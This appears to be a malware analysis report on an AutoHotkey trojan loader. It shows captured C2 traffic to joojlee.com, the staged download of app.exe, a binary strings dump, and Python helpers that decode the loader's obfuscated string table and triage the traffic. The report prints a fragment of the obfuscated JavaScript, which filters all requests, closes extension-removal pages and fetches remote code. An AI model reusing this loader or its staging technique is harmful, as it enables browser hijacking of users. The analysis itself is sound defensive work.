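The type=js response is an obfuscator string table: every element is a run of \xNN escapes and the script that follows refers to them by index. Decoded, the fragment printed above names chrome.webRequest.onBeforeRequest with <all_urls> and blocking, tabs.onUpdated and tabs.remove, the chrome://extension, chrome://chrome/extension, chrome://settings/resetProfileSettings, opera://extensions/, browser://tune/, chrome://help/ and devtools:// pages, and a fetch of http://joojlee.com/ahk/get.js?cache=. The names suggest an extension that filters every request and closes the pages a user would open to remove it; that is an inference from the names, since the capture is cut before the code. An added example, not part of this report, that decodes the table from the fragment exactly as printed above (the input to substitute_refs is a constructed line in the obfuscator's style, not from the capture):

```python
"""Decode the hex-escaped string table from the type=js response.

Added example for this report, not code from the sample or from Lavasoft.
RAW is the fragment as the report prints it (line-wrapped, the leading
"cb8.." being the HTTP chunk size), cut where the capture is cut.
"""
import json
import re

RAW = r"""
cb8..var _0x7dc6=["\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x65\x78\x74\x6
5\x6E\x73\x69\x6F\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x75\x72\x6C","
\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2F\x65\x
78\x74\x65\x6E\x73\x69\x6F\x6E","\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\
x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x72\x65\x73\x65\x74\x50\x72\x6F\x6
6\x69\x6C\x65\x53\x65\x74\x74\x69\x6E\x67\x73","\x6F\x70\x65\x72\x61\x
3A\x2F\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73\x2F","\x62\x72\x6F\
x77\x73\x65\x72\x3A\x2F\x2F\x74\x75\x6E\x65\x2F","\x63\x68\x72\x6F\x6D
\x65\x3A\x2F\x2F\x68\x65\x6C\x70\x2F","\x69\x64","\x72\x65\x6D\x6F\x76
\x65","\x74\x61\x62\x73","\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72
","\x6F\x6E\x55\x70\x64\x61\x74\x65\x64","\x6C\x65\x6E\x67\x74\x68","\
x3C\x61\x6C\x6C\x5F\x75\x72\x6C\x73\x3E","\x62\x6C\x6F\x63\x6B\x69\x6E
\x67","\x6F\x6E\x42\x65\x66\x6F\x72\x65\x52\x65\x71\x75\x65\x73\x74","
\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74","\x63\x73\x70","\x6F\x6E\x72
\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x6
5\x61\x64\x79\x53\x74\x61\x74\x65","\x75\x72\x69","\x70\x75\x73\x68","
\x66\x6F\x72\x45\x61\x63\x68","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x6
5\x78\x74","\x70\x61\x72\x73\x65","\x47\x45\x54","\x68\x74\x74\x70\x3A
\x2F\x2F\x6A\x6F\x6F\x6A\x6C\x65\x65\x2E\x63\x6F\x6D\x2F\x61\x68\x6B\x
2F\x67\x65\x74\x2E\x6A\x73\x3F\x63\x61\x63\x68\x65\x3D","\x72\x61\x6E\
x64\x6F\x6D","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x64\x65\x76\x74\x
6F\x6F\x6C\x73\x3A\x2F\x2F","\x65\x78\x65\x63\x75\x74\x65\x53\x63
"""
# Undo the report's line wrapping; escapes were split across lines.
FRAGMENT = "".join(line.strip() for line in RAW.splitlines())

ARRAY_DECL = re.compile(r"var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[")
# One array element: a quoted run of \xNN escapes. The closing quote is
# optional so the element the capture truncates is still returned.
ELEMENT = re.compile(r'"((?:\\x[0-9A-Fa-f]{2})+)"?')
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_escapes(escaped):
    """Turn '\\x63\\x68' into 'ch'; bytes are read as Latin-1, which is what
    the obfuscator produced them from."""
    return bytes(int(h, 16) for h in ESCAPE.findall(escaped)).decode("latin-1")


def find_string_array(js):
    """Return (array_name, [decoded strings]) for the first var _0x...=[...] table."""
    m = ARRAY_DECL.search(js)
    if not m:
        raise ValueError("no obfuscator string table found")
    body = js[m.end():]
    end = body.find("];")
    if end != -1:                 # complete table; the report's copy is cut before this
        body = body[:end]
    return m.group(1), [decode_escapes(e) for e in ELEMENT.findall(body)]


def substitute_refs(js, name, strings):
    """Replace name[N] lookups with the literal string, the usual first step
    before reading obfuscator output."""
    pattern = re.compile(re.escape(name) + r"\[(\d+)\]")
    return pattern.sub(lambda m: json.dumps(strings[int(m.group(1))]), js)


if __name__ == "__main__":
    name, strings = find_string_array(FRAGMENT)
    for i, s in enumerate(strings):
        print(f"{name}[{i:2}] = {s!r}")
    # Constructed line in the obfuscator's style, not from the capture.
    sample = "chrome[_0x7dc6[17]][_0x7dc6[16]][_0x7dc6[11]](f,{urls:[_0x7dc6[14]]},[_0x7dc6[15]])"
    print(substitute_refs(sample, name, strings))
```

Most obfuscator output also rotates the array before use (a shift loop right after the declaration); when that is present, apply the same rotation to the decoded list before substituting, or the indices will be off by the shift.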

GET /ahk/req.php?type=key HTTP/1.1

User-Agent: AutoHotkey
Host: joojlee.com
Cache-Control: no-cache
Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732


HTTP/1.1 200 OK
Date: Fri, 13 Feb 2015 13:22:12 GMT
Content-Type: text/javascript; Charset=UTF8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 1b81555e04370c6b-AMS
9c..jogoilaonpjembimhekgnboineibhdhf#MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBi
QKBgQDfjeS5fg1FCFXrERdwKEZfr5X45Y/RZMj /2z7yzUJ4lvtVvy73ryJ /KHvK2wKec
sapHK/HXDN9/EPRL4BF/..5d..zhJGDxhQ3KhrHW ouzXBqhrzHpZi 8xB8LOmJ1lTcCJk
2H5IvMId83r3ZF QiEnZio9UhsQaR4yQccdXX6CJp3QIDAQAB..0..
....
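The type=key body is two fields separated by '#': a 32-letter token and a base64 blob that begins MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ, the fixed header of a 1024-bit RSA public key in SubjectPublicKeyInfo form. Chrome extension IDs are 32 characters from a through p, derived from exactly such a key (the manifest "key" field), which is what a dropper needs to install an extension under a known ID. An added example, not part of this report, that pulls the two apart and checks whether the token is the ID Chrome would derive from the key. It assumes the token is a Chrome extension ID and that the spaces inside the blob are '+' characters lost in rendering: base64 contains no spaces, and with that substitution both chunks come to exactly their declared sizes (0x9c and 0x5d bytes) and the blob decodes to the 162 bytes such a key occupies.

```python
"""Split the type=key response into extension ID and public key and check
that they belong together.

Added example for this report, not code from the sample or from Lavasoft.
Assumptions: the 32-letter token is a Chrome extension ID; the base64 blob
is the DER SubjectPublicKeyInfo an extension manifest carries in "key"; the
spaces the report shows inside the blob are '+' characters lost in rendering.
"""
import base64
import hashlib
import re

# Body of the type=key response with the chunk framing ("9c", "5d", "0")
# and line wrapping removed; otherwise verbatim from the report.
KEY_RESPONSE = (
    "jogoilaonpjembimhekgnboineibhdhf#"
    "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBi"
    "QKBgQDfjeS5fg1FCFXrERdwKEZfr5X45Y/RZMj /2z7yzUJ4lvtVvy73ryJ /KHvK2wKec"
    "sapHK/HXDN9/EPRL4BF/"
    "zhJGDxhQ3KhrHW ouzXBqhrzHpZi 8xB8LOmJ1lTcCJk"
    "2H5IvMId83r3ZF QiEnZio9UhsQaR4yQccdXX6CJp3QIDAQAB"
)

# DER header of a 1024-bit RSA SubjectPublicKeyInfo, up to and including the
# leading zero byte of the modulus INTEGER (29 bytes).
RSA1024_SPKI_PREFIX = bytes.fromhex(
    "30819f300d06092a864886f70d010101050003818d0030818902818100"
)
EXTENSION_ID = re.compile(r"[a-p]{32}")


def parse_key_response(body):
    """Split 'id#base64key' into (id, der_bytes). Raises ValueError on junk."""
    ext_id, sep, b64 = body.partition("#")
    if not sep or not EXTENSION_ID.fullmatch(ext_id):
        raise ValueError("no extension ID before '#'")
    b64 = b64.replace(" ", "+")          # assumed rendering damage, see above
    der = base64.b64decode(b64, validate=True)
    return ext_id, der


def rsa_public_key_fields(der):
    """Return (modulus, exponent) from a 1024-bit RSA SPKI, or None if the
    header is not the fixed one such keys have. A full DER parser is not
    needed for a single known shape."""
    if len(der) != 162 or not der.startswith(RSA1024_SPKI_PREFIX):
        return None
    n = int.from_bytes(der[29:157], "big")
    if der[157:159] != b"\x02\x03":      # INTEGER of length 3: the exponent
        return None
    e = int.from_bytes(der[159:162], "big")
    return n, e


def extension_id_from_key(der):
    """Chrome's ID derivation: SHA-256 of the DER public key, first 128 bits,
    each hex digit mapped 0..f -> a..p."""
    digest = hashlib.sha256(der).hexdigest()[:32]
    return digest.translate(str.maketrans("0123456789abcdef", "abcdefghijklmnop"))


def check_key_response(body):
    """Report the delivered ID, the ID the key implies, whether they agree,
    and the RSA parameters."""
    ext_id, der = parse_key_response(body)
    derived = extension_id_from_key(der)
    fields = rsa_public_key_fields(der)
    return {
        "delivered_id": ext_id,
        "derived_id": derived,
        "ids_match": derived == ext_id,
        "modulus_bits": fields[0].bit_length() if fields else None,
        "exponent": fields[1] if fields else None,
    }


if __name__ == "__main__":
    for k, v in check_key_response(KEY_RESPONSE).items():
        print(f"{k}: {v}")
```

If ids_match comes back True, the manifest key was generated from this very public key and the extension will always install as jogoilaonpjembimhekgnboineibhdhf, which makes the ID itself a usable indicator in extension inventories. If it comes back False, either the rendering damaged more than the '+' characters or the server pairs the ID with a different key; the example does not assume either outcome.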



GET /ahk/req.php?type=arsiv_hash HTTP/1.1

User-Agent: AutoHotkey
Host: joojlee.com
Cache-Control: no-cache
Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732


HTTP/1.1 200 OK
Date: Fri, 13 Feb 2015 13:22:13 GMT
Content-Type: text/javascript; Charset=UTF8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 1b81555f145f0c6b-AMS
20..0c4950e06182df940d3e841551aa4378..0..


GET /app.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: 8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com:80
Accept: */*


HTTP/1.0 200 OK
Last-Modified: Fri, 23 Jan 2015 17:14:24 GMT
ETag: 0c4950e06182df940d3e841551aa4378
Origin: hXXps://mycloud.rackspace.com
Content-Length: 31990778
Accept-Ranges: bytes
X-Timestamp: 1422033263.32882
Content-Type: application/x-msdownload
X-Trans-Id: tx696ae59a7f254d19ab13a-0054c281b8dfw1
Cache-Control: public, max-age=101699
Expires: Sat, 14 Feb 2015 17:37:12 GMT
Date: Fri, 13 Feb 2015 13:22:13 GMT
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........f..{5..{5
..{5...5..{5..z5(.{5...5..{5...5..{5...5..{5...5..{5...5..{5...5..{5Ri
ch..{5........PE..L...Yj>O.....................d...............0...
.@..................................................................K.
.3...L<[email protected]....................
...........................0...............................text...2...
........................ ..`.rdata..5....0......."..............@[email protected]
ata....V...P.......@[email protected]..........
....@[email protected][email protected]..............@..@......................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................@s... s...........
.............................D$..L$....L$.u..D$......S.....D$..d$....D
$.....[...............WVS3..D$...}.G.T$.........D$..T$..D$...}.G.T$...
......D$..T$...u..L$..D$.3......D$......A...L$..T$..D$...........u....
..d$....D$.....r.;T$.w.r.;D$.v.N3...Ou........[^_.........WVU3.3..D$..
.}.GE.T$.........D$..T$..D$...}.G.T$.........D$..T$...u(.L$..D$.3.....
.D$........d$......d$....G...L$..T$..D$...........u......d$....D$.....
r.;T$.w.r.;D$.v.N D$..T$.3. D$..T$.My..................Ou........]

<<< skipped >>>

GET /ahk/req.php?type=arsiv_link HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: joojlee.com:80
Accept: */*


HTTP/1.1 302 Found
Date: Fri, 13 Feb 2015 13:22:13 GMT
Content-Type: text/javascript; Charset=UTF8
Connection: close
Set-Cookie: __cfduid=d83c62d96bebba502ef4c4978ed3a11481423833733; expires=Sat, 13-Feb-16 13:22:13 GMT; path=/; domain=.joojlee.com; HttpOnly
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Location: hXXp://8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com/app.exe
Server: cloudflare-nginx
CF-RAY: 1b81556307370c89-AMS
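Taken together, the exchanges above are a staged download: the AutoHotkey-compiled loader (the User-Agent the IDS verdict fires on) polls req.php for a hash and a link, a bundled wget follows the link, the link answers with a 302 to a Rackspace Cloud Files object, and the 32-hex value returned for type=arsiv_hash equals the ETag on the app.exe response, which Cloud Files (OpenStack Swift) sets to the object's MD5. An added example, not part of this report, that parses a text dump in the shape printed above and runs those checks. The dump is constructed from this report's own capture with bodies shortened and the exchanges put in causal order (the report prints the app.exe fetch before the 302 that led to it). That the loader uses arsiv_hash to verify the download is an assumption; the capture shows the value, not its use.

```python
"""Triage a captured request/response dump: flag the User-Agent the IDS
alerted on, list the C2 staging sequence, collect redirects, and compare the
hash the C2 hands out with the ETag of the payload it redirects to.

Added example for this report, not code from the sample or from Lavasoft.
CAPTURE is constructed from the report's own traffic section.
"""
import re

CAPTURE = """\
GET /ahk/ok.txt HTTP/1.1
User-Agent: AutoHotkey
Host: joojlee.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 9
Server: cloudflare-nginx

Server_ok

GET /ahk/req.php?type=update_hash HTTP/1.1
User-Agent: AutoHotkey
Host: joojlee.com

HTTP/1.1 200 OK
Content-Type: text/javascript; Charset=UTF8
Transfer-Encoding: chunked

GET /ahk/req.php?type=js HTTP/1.1
User-Agent: AutoHotkey
Host: joojlee.com

HTTP/1.1 200 OK
Content-Type: text/javascript; Charset=UTF8

var _0x7dc6=[...];

GET /ahk/req.php?type=key HTTP/1.1
User-Agent: AutoHotkey
Host: joojlee.com

HTTP/1.1 200 OK
Content-Type: text/javascript; Charset=UTF8

jogoilaonpjembimhekgnboineibhdhf#MIGf...

GET /ahk/req.php?type=arsiv_hash HTTP/1.1
User-Agent: AutoHotkey
Host: joojlee.com

HTTP/1.1 200 OK
Content-Type: text/javascript; Charset=UTF8

0c4950e06182df940d3e841551aa4378

GET /ahk/req.php?type=arsiv_link HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: joojlee.com:80

HTTP/1.1 302 Found
Location: http://8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com/app.exe
Server: cloudflare-nginx

GET /app.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: 8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com:80

HTTP/1.0 200 OK
ETag: 0c4950e06182df940d3e841551aa4378
Content-Length: 31990778
Content-Type: application/x-msdownload

MZ...
"""

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
STATUS_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})\b")


def parse_http_dump(text):
    """Parse a plain-text dump of request/response pairs into dicts with
    method, path, req_headers, status, resp_headers and body. Header names
    are lower-cased; the blank line after the response headers starts the
    body, which runs until the next request line."""
    exchanges, ex, in_body = [], None, False
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if m:
            ex = {"method": m.group(1), "path": m.group(2), "req_headers": {},
                  "status": None, "resp_headers": {}, "body": []}
            exchanges.append(ex)
            in_body = False
            continue
        if ex is None:
            continue                      # junk before the first request
        if in_body:
            ex["body"].append(line)
            continue
        m = STATUS_LINE.match(line)
        if m and ex["status"] is None:
            ex["status"] = int(m.group(1))
            continue
        if not line.strip():
            in_body = ex["status"] is not None and bool(ex["resp_headers"])
            continue
        name, _, value = line.partition(":")
        headers = ex["resp_headers"] if ex["status"] is not None else ex["req_headers"]
        headers[name.strip().lower()] = value.strip()
    for ex in exchanges:
        ex["body"] = "\n".join(ex["body"]).strip()
    return exchanges


def suspicious_user_agents(exchanges, pattern=re.compile(r"AutoHotkey")):
    """Requests whose User-Agent matches; mirrors the intent of the
    'ET TROJAN Suspicious User-Agent (AutoHotkey)' verdict."""
    return [(ex["method"], ex["path"]) for ex in exchanges
            if pattern.search(ex["req_headers"].get("user-agent", ""))]


def c2_sequence(exchanges):
    """The type= values requested from req.php, in order."""
    out = []
    for ex in exchanges:
        m = re.search(r"[?&]type=(\w+)", ex["path"])
        if m:
            out.append(m.group(1))
    return out


def redirects(exchanges):
    """(path, Location) for every 3xx response."""
    return [(ex["path"], ex["resp_headers"].get("location"))
            for ex in exchanges if ex["status"] and 300 <= ex["status"] < 400]


def payload_hash_check(exchanges):
    """Compare the arsiv_hash body with the ETag on the app.exe response.
    Cloud Files sets ETag to the object's MD5, so the two agree if the C2
    is handing out an MD5 of that object (assumed, not shown in the capture)."""
    c2_hash = next((ex["body"] for ex in exchanges if "type=arsiv_hash" in ex["path"]), None)
    etag = next((ex["resp_headers"].get("etag", "").strip('"')
                 for ex in exchanges if ex["path"].endswith("/app.exe")), None)
    ok = bool(c2_hash and etag and re.fullmatch(r"[0-9a-f]{32}", c2_hash)
              and c2_hash == etag.lower())
    return c2_hash, etag, ok


if __name__ == "__main__":
    ex = parse_http_dump(CAPTURE)
    print("suspicious UA:", suspicious_user_agents(ex))
    print("C2 sequence:", c2_sequence(ex))
    print("redirects:", redirects(ex))
    print("hash vs ETag:", payload_hash_check(ex))
```

For a real pcap, feed the parser the output of a stream reassembly (tshark -z follow or the like) rather than the rendered report; the parser expects one request line per exchange and a blank line between response headers and body.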


The Trojan connects to the servers at the following location(s):

Chromium.exe_1116:

.text
`.rdata
@.data
.rsrc
YYu.Pj
!"#$%%&'())* ,-./0123456789:;<""=>
VSSSh
E`SSh
SSSSSSSh
urSSSh
WSSSh
zSSShX
t*SSh
t3SSSh
VWumh0%F
u.hL%F
It.It
SSSSh
tASSSh
udPS
uÊ;MP|
!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC<=>?@AB
AutoHotkey
AppsKey
ListHotkeys
KeyHistory
DetectHiddenWindows
SetKeyDelay
Hotkey
KeyWait
GetKeyState
URLDownloadToFile
MsgBox
IfMsgBox
AHK Keybd
X X
NOTE: To disable the key history shown below, add the line "#KeyHistory 0" anywhere in the script. The same method can be used to change the size of the history buffer. For example: #KeyHistory 100 (Default is 40, Max is 500)
The oldest are listed first. VK=Virtual Key, SC=Scan Code, Elapsed=Seconds since the previous event. Types: h=Hook Hotkey, s=Suppressed (blocked), i=Ignored because it was generated by an AHK script, a=Artificial, #=Disabled via #IfWinActive/Exist.
NOTE: Only the script's own keyboard events are shown
(not the user's), because the keyboard hook isn't installed.
Modifiers (Hook's Logical) = %s
Modifiers (Hook's Physical) = %s
Prefix key is down: %s
OWarning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
"%s" is not a valid key name. The current thread will exit.
"%s" is not allowed as a prefix key.
%u hotkeys have been received in the last %ums.
(see #MaxHotkeysPerInterval in the help file)
Max hotkeys.
The AltTab hotkey "%s" must have exactly one modifier/prefix.
The AltTab hotkey "%s" must specify which key (L or R).
Nonexistent hotkey variant (IfWin). The current thread will exit.
Nonexistent hotkey. The current thread will exit.
SCx
A%s[%u of %u]: %-1.60s%s
: -*.|&^/
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CURRENT_CONFIG
HKEY_CLASSES_ROOT
HKEY_LOCAL_MACHINE
%s\%s
<>=/|^,:*&~!() -"'\;`{}
timesincepriorhotkey
timesincethishotkey
priorhotkey
thishotkey
subkey
keydelay
detecthiddenwindows
%s%s%s
if %s %s %s and %s
%s%s %s %s
MbP?u:
%sGlobal Variables (alphabetical)%s
Local Variables for %s()%s
Key History has been disabled via #KeyHistory 0.
Window: %s
Keybd hook: %s
Mouse hook: %s
Enabled Timers: %u of %u (%s)
Interrupted threads: %d%s
Paused threads: %d of %d (%d layers)
Modifiers (GetKeyState() now) = %s
AutoHotkey2
%%%s%s%s
Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0). The bottommost line's elapsed time is the number of seconds since it executed.
Critical Error: %s
Specifically: %-1.100s%s
%s%s: %-1.500s
in #include file "%s"
Specifically: %s
%s (%d) : ==> %s
Line Text: %-1.100s%s
Error at line %u
Action: <%-0.400s%s>%s
Params: <%-0.400s%s>
Verb: <%s>
.hta"
.cmd"
.com"
.bat"
.exe"
%s %s
System verbs unsupported with RunAs. The current thread will exit.
#KeyHistory
#MaxThreadsPerHotkey
#MaxHotkeysPerInterval
#HotkeyInterval
#HotkeyModifierTimeout
#InstallKeybdHook
<>=/|^,:*&~!() -
Too many parameters passed to function.
Too few parameters passed to function.
Caller must pass a variable to this ByRef parameter.
<>/|^,*&~!. -"
Unsupported parameter default.
<>=/|^,:*&~!()"
"%s" requires that parameter #%u be non-blank.
"%s" requires at least %d parameter%s.
Invalid hotkey.
<>=/|^,:*&~!() -".
Unsupported static initializer.
Could not extract script from EXE.
Duplicate hotkey.
Hotkeys/hotstrings are not allowed inside functions.
{Blind}{%s Up}
*%s::
*%s up::
{Blind}%s%s{%s DownTemp}
if not GetKeyState("%s")
Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.
<>=/|^,:
<>=/|^,:. -*&!?~
Join
>AUTOHOTKEY SCRIPT<
EndKey:
SOFTWARE\AutoHotkey
\\.\%c:
\\.\vwin32
open "%s" alias AHK_PlayMe
All Files (*.*)
Text Documents (*.txt)
*.txt
%s%c%sÊll Files (*.*)%c*.*%c
Select File - %s
1.0.48.05
\AutoHotkey.exe
WIN32_WINDOWS
.DEFAULT\Control Panel\Desktop\ResourceLocale
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Compile error %d at offset %d: %s
%sBottom
%sRight
%sTop
%sLeft
0xX
Could not open URL hXXp://VVV.autohotkey.com in default browser.
hXXp://VVV.autohotkey.com
hh.exe
%sAutoHotkey.chm"
\AutoHotkey.chm"
%sAU3_Spy.exe"
\AU3_Spy.exe"
set cd door %s wait
open %s type cdaudio alias cd wait shareable
set cdaudio door %s wait
Component Doesn't Support This Control Type
Mixer Doesn't Support This Component Type
0xX
Mb@AAutoHotkey v1.0.48.05
Len%d
Pos%d
Len%s
Pos%s
0.0.0.0
InternetOpenUrlA
Select Folder - %s
%u.%u.%u.%u
RunAs: Missing advapi32.dll. The current thread will exit.
%dGui
vkX
AutoHotkeyGUI
Password
Report
msctls_hotkey32
Button%s
&Suspend Hotkeys
Supported only for the tray menu The current thread will exit.
dddddd
dA\\?\
GdiplusShutdown
dd
The following %s name contains an illegal character:
"%-1.300s"%s
The maximum number of MsgBoxes has been reached.
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
WSOCK32.dll
WINMM.dll
VERSION.dll
COMCTL32.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardLayout
UnhookWindowsHookEx
SetWindowsHookExA
RegisterHotKey
UnregisterHotKey
SetKeyboardState
GetKeyboardState
VkKeyScanExA
MapVirtualKeyA
GetAsyncKeyState
GetKeyNameTextA
keybd_event
EnumChildWindows
EnumWindows
ExitWindowsEx
USER32.dll
GDI32.dll
comdlg32.dll
RegCloseKey
RegEnumKeyExA
RegQueryInfoKeyA
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
ADVAPI32.dll
ShellExecuteExA
SHFileOperationA
SHELL32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
-()[]{}:;'"/\,.?!
zcÁ
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data\Chromium.exe
@.reloc
\$@9_0~{
V SSh
N SSh
Codejock.SkinFrameworkGlobalSettings.12.0.2
Codejock.SkinFramework.12.0.2
1.2.10
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
MFC42.DLL
MSVCRT.dll
OLEPRO32.DLL
IMAGEHLP.dll
SKINFRAMEWORK.OCX
Xtreme %s ActiveX %s
v12.0.2
Xtreme SuitePro ActiveX %s
.PAVCException@@
%d.%d.%d
%s [%s]
.PAVCOleException@@
Codejock.%s.v%i.%i.%i.lic
PRODUCT-ID: Codejock.SkinFramework.ActiveX.v12.0
RemoveAllWindows
AutoApplyNewWindows
.cjstyles
.msstyles
Themes.ini
PortName
msimg32.dll
GDI32.DLL
IsAlphaIconsSupported
.PAVCMemoryException@@
.PAVCArchiveException@@
XTPNotificationSinkMT_MsgWnd
%Y-%d-%mT%H:%M:%S
%Y-%d-%m
%H:%M:%S
%s[%i]
windows-1254
windows-874
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese (Brazil)
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
Portuguese (Portugal)
windows-1255
windows-1257
windows-1253
windows-1252
windows-1250
windows-1256
windows-1251
COMCTL32.DLL
User32.dll
UXTHEME.DLL
MSCTF.DLL
WININET.DLL
USER32.DLL
KERNEL32.DLL
SHLWAPI.DLL
NTDLL.DLL
UxTheme.dll
PSAPI.DLL
%[^,], %ld, %s
LEFTPRESSED
ALWAYSSHOWSIZINGBAR
MSGBOXFONT
WindowsForms
libpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
NULL row buffer for row %ld, pass %d
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
iTXt chunk not supported.
.PAVCFileException@@
&%%'%'%'%'%'%'%'%%%
311111111111111111
337173737371733377
77777777777
7777777777777777
9999999999
9;9;9;9;9
22222222222222222322
2222222222222222
.((2((2((2(.
}'$%2$%%%2$%%$2
0/,/,***/,/,{
,,,,333/,,,
999999999
99999999
`/,,,/,3,/,////1
stdole2.tlbWWW
AutoApplyNewWindowsW
RemoveAllWindows
.\..\Help\SymbolReference.chmW 
Xtreme SkinFramework ActiveX Control 12.0.2WWW
1%2s2
0 0$0(0,0004080<0
4O4g4
: :$:(:,:'<.<
4$4(4,40444
0 0004080<0@0
.Class 3 Public Primary Certification Authority0
hXXp://ocsp.verisign.com0
"hXXp://crl.verisign.com/tss-ca.crl0
Thawte Certification1
0hXXp://crl.verisign.com/ThawteTimestampingCA.crl0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)041.0,
hXXps://VVV.verisign.com/rpa01
hXXp://crl.verisign.com/pca3.crl0
.Class 3 Public Primary Certification Authority
/hXXp://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0?
3hXXp://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0
hXXp://VVV.codejock.com 0
`.data
.reloc
CmDialogWndClass
cmdlg98.chm
Windows
%s,%s,%s
%s.drv
WINSPOOL.DRV
Ports
MbP?hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
COMDLG32.OCX
z!{lX-X-X-XX-XXXXXX}
SSShD:{!
GetProcessHeap
CreateDialogIndirectParamA
RegOpenKeyA
GetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
%s%s.DLL
%u\%s.dll
{lX-X-X-XX-XXXXXX}
CLSID\%s
%s Object
%s.%s.%ld
%s.%s
%s.%s\CurVer
%s\InprocServer
VERSION.DLL
%ld - %s
cdlGetNotSupportedWW
0{ cdlSetNotSupportedWW
0B.cdlMemAllocFailureWW
.cdlNoFontsWW
cdlHelpKeyWW
cdlHelpPartialKeyWWWX
cdlPortraitWX
HelpKeyW
pbstrHelpKey
ComDlg32.OcxWW
cmdlg98.chmWWW
Sets or returns state of Collate check box.WWW%
Prevents a warning message when there is no default printer.WW5
Sets or returns the state of the Pages option button.WE
Returns a device context for the printer selection.WWW
Dialog box displays the Help button.WW!
Sets support for multiple copies.W,
Sets initial color value for the dialog box.WWK
Entire dialog box is displayed, including the Define Custom Colors section.WWW<
Disables the Define Custom Colors section of the dialog box.WW"
Generates a message box if the selected file already exists.WW
Allows invalid characters in the returned file name.WW:
Extension of returned file name is different from the one set by DefaultExt.WW%
User can enter only names of existing files.WWF
The returned file will not have the Read Only attribute set.WW
Windows 95 Open A File dialog box template.WWW
Long filenames.WWW;
Dialog box lists only screen fonts supported by the system.WWW5
Dialog box lists only fonts supported by the printer.W4
Dialog box lists available screen and printer fonts.WW7
Dialog enables strikeout, underline, and color effects.WWW$
Dialog box enables the Apply button.WW@
Dialog box allows only fonts that use the Windows character set.WW3
Dialog box should not allow vector-font selections.WWWL
Dialog box should not allow graphic device interface (GDI) font simulations.WWH
Selects font sizes within the range specified by Min and Max properties.WW0
Dialog box should select only fixed-pitch fonts.WWL
Allows only the selection of fonts available to both the screen and printer.WWG
Displays an error if a user selects a font or style that doesn't exist.WWW>
No font style selected.WWW
